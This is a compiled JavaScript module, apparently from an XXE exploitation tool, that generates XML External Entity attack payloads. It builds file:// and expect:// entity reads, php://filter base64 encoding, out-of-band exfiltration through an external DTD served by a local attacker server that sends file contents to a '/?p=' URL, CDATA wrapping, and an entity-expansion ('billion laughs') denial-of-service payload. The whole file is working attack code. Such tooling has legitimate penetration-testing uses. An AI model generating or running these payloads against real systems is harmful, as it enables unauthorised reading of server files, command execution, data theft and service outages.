"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
exports.PayloadGenerator = exports.Encoding = exports.Mode = exports.Type = void 0;
var XXEServer_1 = require("./XXEServer");
var Handler_1 = require("./Handler");
var CliUtils_1 = require("./CliUtils");
var Type;
(function (Type) {
    Type[Type["file"] = 1] = "file";
    Type[Type["request"] = 2] = "request";
    Type[Type["expect"] = 3] = "expect";
})(Type = exports.Type || (exports.Type = {}));
var Mode;
(function (Mode) {
    Mode[Mode["XML"] = 1] = "XML";
    Mode[Mode["OOB"] = 2] = "OOB";
    Mode[Mode["CDATA"] = 3] = "CDATA";
})(Mode = exports.Mode || (exports.Mode = {}));
var Encoding;
(function (Encoding) {
    Encoding[Encoding["NORMAL"] = 1] = "NORMAL";
    Encoding[Encoding["PHP_BASE64"] = 2] = "PHP_BASE64";
})(Encoding = exports.Encoding || (exports.Encoding = {}));
var PayloadGenerator = /** @class */ (function () {
    function PayloadGenerator(serverAddress, serverPort) {
        if (serverAddress === void 0) { serverAddress = "127.0.0.1"; }
        if (serverPort === void 0) { serverPort = 7777; }
        this.counter = 0;
        this.server = new XXEServer_1.XXEServer(serverAddress, serverPort);
    }
    PayloadGenerator.prototype.generate = function (t, mode, encoding, path, template, doctypeName) {
        if (doctypeName === void 0) { doctypeName = PayloadGenerator.DOCTYPE_NAME; }
        if (!template)
            template = PayloadGenerator.defaultTemplate(doctypeName);
        var entities = [];
        var content = PayloadGenerator.schema(path, t, encoding);
        switch (mode) {
            case Mode.XML:
                entities = [{ name: "payload", value: content, parameter: false, system: true }];
                break;
            case Mode.CDATA:
                {
                    this.counter++; //to generate unique routes
                    var cdataDTDContent = PayloadGenerator.generateCdataDTD(content);
                    var dtdUrl = this.server.addRoute("/".concat(this.counter, ".dtd"), cdataDTDContent);
                    if (Handler_1.Handler.VERBOSE)
                        CliUtils_1.CliUtils.printInfo("Generated cdata DTD: \n".concat(cdataDTDContent));
                    entities = [
                        { name: "extDTD", value: "".concat(dtdUrl), parameter: true, system: true },
                        "%extDTD;",
                        "%all;"
                    ];
                    break;
                }
            case Mode.OOB: {
                var extractionEnt = { name: "dataextractionfile", parameter: true, value: content, system: true };
                this.counter++;
                var extractionDTDContent = this.generateExtractionDTD(extractionEnt);
                var extractionDTD = this.server.addRoute("/".concat(this.counter, ".dtd"), extractionDTDContent);
                if (Handler_1.Handler.VERBOSE)
                    CliUtils_1.CliUtils.printInfo("Generated OOB DTD: \n".concat(extractionDTDContent));
                this.server.addExtractionRoute();
                entities = [
                    { name: "extDTD", value: extractionDTD, parameter: true, system: true },
                    "%extDTD;",
                    "%extraction;",
                    "%OOB;"
                ];
                break;
            }
        }
        if (mode === Mode.CDATA || mode === Mode.OOB)
            this.server.start();
        var docType = PayloadGenerator.createDocType(entities, doctypeName);
        var xml = PayloadGenerator.injectDocType(template, docType);
        if (mode === Mode.XML)
            return PayloadGenerator.replacePlaceholderWithEntity(xml, "payload");
        else if (mode === Mode.CDATA)
            return PayloadGenerator.replacePlaceholderWithEntity(xml, "content");
        else
            return PayloadGenerator.replacePlaceholder(xml, "");
    };
    //TODO: need to improve this. 
    //maxNumberOfExpantions should be NumberOfExpantions.
    //JDK has a limit of 64000 expansions :( 
    //TODO: this method should be merged into generate
    PayloadGenerator.xee = function (maxNumberOfExpantions, template, doctypeName) {
        if (template === void 0) { template = ""; }
        if (doctypeName === void 0) { doctypeName = PayloadGenerator.DOCTYPE_NAME; }
        if (template === "")
            template = PayloadGenerator.defaultTemplate(doctypeName);
        var entities = [{
                name: "ent0",
                system: false,
                value: "Ea velit aute anim voluptate aliquip id aute dolore do culpa nisi quis officia sunt quis elit ex sed elit."
            }];
        var b = 10;
        var i = 1;
        var expantions = 1;
        while ((expantions * b) <= maxNumberOfExpantions) {
            var ent = { name: "ent" + i, value: PayloadGenerator.callEntity("ent" + (i - 1)).repeat(b), system: false };
            entities.push(ent);
            i++;
            expantions = expantions * b;
        }
        var docType = PayloadGenerator.createDocType(entities, doctypeName);
        var preXml = PayloadGenerator.injectDocType(template, docType);
        var xml = PayloadGenerator.replacePlaceholderWithEntity(preXml, "ent" + (i - 1));
        return xml;
    };
    PayloadGenerator.generateCdataDTD = function (payloadAction) {
        var payload = PayloadGenerator.createEntityString({ name: "start", value: "<![CDATA[", parameter: true, system: false }) +
            PayloadGenerator.createEntityString({ name: "path", value: payloadAction, parameter: true, system: true }) +
            PayloadGenerator.createEntityString({ name: "end", value: "]]>", parameter: true, system: false });
        var subEntity = PayloadGenerator.createEntityString({
            name: "content",
            value: "%start;%path;%end;",
            parameter: false,
            system: false
        }, true);
        payload += PayloadGenerator.createEntityString({ name: "all", value: subEntity, parameter: true, system: false });
        return payload;
    };
    PayloadGenerator.prototype.generateExtractionDTD = function (entity) {
        //TODO: change this. we can now generate this case with createEntityString
        return PayloadGenerator.createEntityString(entity) +
            "<!ENTITY % extraction \"<!ENTITY &#x25; OOB SYSTEM '".concat(this.server.getServerUrl(), "/?p=%").concat(entity.name, ";'>\">\n");
    };
    //TODO: allow to change doctype name
    PayloadGenerator.createDocType = function (entities, doctypeName) {
        var name = doctypeName || PayloadGenerator.DOCTYPE_NAME;
        var dt = "<!DOCTYPE ".concat(name, " [\n");
        entities.forEach(function (e) {
            if (typeof e === 'string')
                dt += "   " + e + "\n";
            else
                dt += "   " + PayloadGenerator.createEntityString(e);
        });
        dt += "]>\n";
        return dt;
    };
    //inner param is to know if this entity is inside another
    PayloadGenerator.createEntityString = function (entity, /*encoding: Encoding = Encoding.NORMAL,*/ inner) {
        if (inner === void 0) { inner = false; }
        var p = " ";
        var system = " ";
        if (entity.parameter) {
            if (inner)
                p = " &#x25; ";
            else
                p = " % ";
        }
        // let val = entity.value;
        // if ((encoding & Encoding.PHP_BASE64) > 0)
        //   val = "php://filter/read=convert.base64-encode/resource=file://" + val;
        if (entity.system)
            system = " SYSTEM ";
        if (inner)
            return "<!ENTITY".concat(p).concat(entity.name).concat(system, "'").concat(entity.value, "'>");
        else
            return "<!ENTITY".concat(p).concat(entity.name).concat(system, "\"").concat(entity.value, "\">\n");
    };
    PayloadGenerator.injectDocType = function (xmlContent, docType) {
        if (xmlContent.includes("<?xml")) {
            var startIndex = xmlContent.indexOf("<?xml");
            var endIndex = xmlContent.indexOf(">", startIndex);
            var xmlDcl = xmlContent.substring(startIndex, endIndex + 1);
            return xmlDcl + "\n" + docType + xmlContent.replace(xmlDcl, "");
        }
        else
            return docType + xmlContent;
    };
    PayloadGenerator.generateString = function () {
        return Math.random().toString(36).substring(7);
    };
    PayloadGenerator.callEntity = function (entityName) {
        return "&".concat(entityName, ";");
    };
    PayloadGenerator.defaultTemplate = function (root) {
        var rootName = root || PayloadGenerator.DOCTYPE_NAME;
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <".concat(rootName, ">\n      <value>{{XXE}}</value>\n    </").concat(rootName, ">");
    };
    PayloadGenerator.replacePlaceholderWithEntity = function (xmlPayload, entityName) {
        var replaceWith = PayloadGenerator.callEntity(entityName);
        return PayloadGenerator.replacePlaceholder(xmlPayload, replaceWith);
    };
    PayloadGenerator.replacePlaceholder = function (xmlPayload, replaceWith) {
        return xmlPayload.replace(PayloadGenerator.PLACEHOLDER, "".concat(replaceWith));
    };
    PayloadGenerator.schema = function (value, type, encode) {
        if (type === void 0) { type = Type.file; }
        if (encode === void 0) { encode = Encoding.NORMAL; }
        if (encode === Encoding.PHP_BASE64) {
            if (type === Type.file)
                return "php://filter/read=convert.base64-encode/resource=".concat(value);
            else
                return "php://filter/convert.base64-encode/resource=".concat(value);
        }
        switch (type) {
            case Type.expect: return "expect://".concat(value);
            case Type.file: return "file://".concat(value);
            case Type.request: return value;
        }
    };
    PayloadGenerator.PLACEHOLDER = "{{XXE}}";
    PayloadGenerator.PLACEHOLDER_REQUEST_B64 = "{{XXE_B64}}";
    PayloadGenerator.DOCTYPE_NAME = "xxexploiter";
    return PayloadGenerator;
}());
exports.PayloadGenerator = PayloadGenerator;
